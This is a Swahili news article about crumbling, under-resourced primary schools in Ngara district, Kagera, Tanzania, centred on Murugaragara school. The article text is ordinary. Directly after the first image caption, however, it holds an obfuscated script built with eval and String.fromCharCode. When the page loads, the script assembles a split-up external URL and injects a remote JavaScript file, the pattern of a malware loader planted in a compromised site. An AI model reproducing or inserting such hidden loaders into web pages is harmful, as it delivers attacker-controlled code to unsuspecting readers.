Recent Comments

Majengo ya Shule Nyingi Hali Ni Tete – Ngara, Kagera

By Baraka Bitariho Feb 25, 2023
<p>Shule ya Msingi ya Murugaragara, iliyopo Rulenge,, Kagera</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Ni wiki hii inayoisha kesho ambapo mbunge wa Ngara, George Ruhoro alionekana kwenye video inayosambaa kwenye mitandao ya kijamii
(Social Media) alisikika akitoa mchango wa milioni 3 kusaidia katika unjenzi wa vyoo. Mheshimiwa Ruhoro alielekeza mchango wake kwenye uboreshaji wa matundu ya vyoo.

 

Idadi ya walimu wa nyingi Wilani Ngara ni ndogo sana. Wanafunzi ni wengi sana na walimu wanashindwa kutoa huduma inayofaa kutokana na walimu kutwishwa mzingo mkubwa. Vyumba vya madarasa na idadi ya madarasa bado ni changamoto sana. Wizara ya elimu na kitengo kinachosimamia shule na maswala ya elimu Wilani Ngara mnaangusha wana Ngara kwa kutoleta hizi changamoto hadharani ili viongozi na wadau watafute tatuzi. Elimu kwa mazingira haya ni ngumu sana na Kagera itaendelea kuonekana ni Masikini. Pengine ukimya wa kufunika hali zinazosikitisha ni chanzo kikubwa cha umasikini uliopo.

Alionekana kwenye shule iliyojengwa kwa udongo, ambayo haina umeme wala nyenzo bora zinazohitajika katika kuwandaa wanafunzi katika kukabiliana na technolojia inauozidi kuenea na kutawala maisha ya ulimwengu wa leo. Inasemekana kuwa watoto ni taifa la kesho. Huu unaweza ukawa ni msemo tuu bila uwekezaji katika sekta ya elimu. Hali ya ajengo mengi ya shule zilizopo Wilayani Ngara inadhihirisha kuwa Ngara bado ina uhitaji mkubwa wa kuboresha sekta mbali mbali hususani shule. Shule ni viwanda vizuri vinavyofinyanga watumishi na viongozi wa Tanzania na ulimwengu wa kesho. Ni shule hizi hizi hasa za vijijini zilizofundisha na kutuletea vinara kama Asha Migiro, John Magufuli, Ann Tibaijuka na wengine ambao kwa mchango wao katika tasinia ya siasa wameiwakilisha Tanzania vyema tuu, kitaifa na kwenye majukwaa ya kimataifa. Ifatayo ni video inayoonyesha hali ya shule nyingi zilivyo wilayani Ngara.

 

Shule ya Msingi ya Murugaragara, iliyopo Rulenge,, Kagera

Hii shule inaitwa Murugaragara na ipo kata ya Rulenge , kijji cha Murugaragara

Wanafunzi wa Shule ya Msingi Murugaragara, Rulenge Kagera wakiwa darasani.

Wanao onekana katika video hii ni wanafunzi wa shule hiyo. Na hii ni shule mugura uliopita iliyoongoza kiufauru kuwilaya na kimkoa. Hakika, uboreshwaji unahitajika katika shule nyingi Wilayani Ngara na tunaomba serikali ya Mama Samia iangalie Wilaya ya Ngara kwa jicho la huruma ili hivi viwanda viendelee kuzalisha wasomi bora na wana Ngara wasisite kupereka watoto wao shuleni. Mazingira magumu shuleni yamechangia katika watoto wengi kutomaliza shule ama kuolewa wakiwa wadogo.

Picha hazidanganyi, shule nyingi wilayani Ngara hazitakiwi kupokea wanafunzi, idadi ya walimu ni ndogo na shule zina watoto wengi. Kimsingi, hizi shule hazitakiwi kufunguliwa kisheria, masharti ya wizara ya elimu yakizingatiwa kikamilifu.

“Mkoa wa Kagera utaendelea kutajwa kama ni mkoa masikini kama hali yenyewe ni kama hii”, aliongea mwana Ngara mmoja aliyejitambulisha kama Mbombeke. Aliendelea kusema Kagera imesahaulika katika ukuzaji na uchumi wa nchi kwani hata mbuga na mali asili iliyopo kanda ya ziwa hazitangazwi. Wageni wanakuja kuchungulia na kuchota chocote wanachokiona kinafaa, sasa sehemu kama hizi kweli zitazalisha msomi mwenye uwezo hafifu na atakayeonewa kwa kuwa atakua akidorora kwenye uchumi wa kisasa, aliyaongea Mbombeke.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com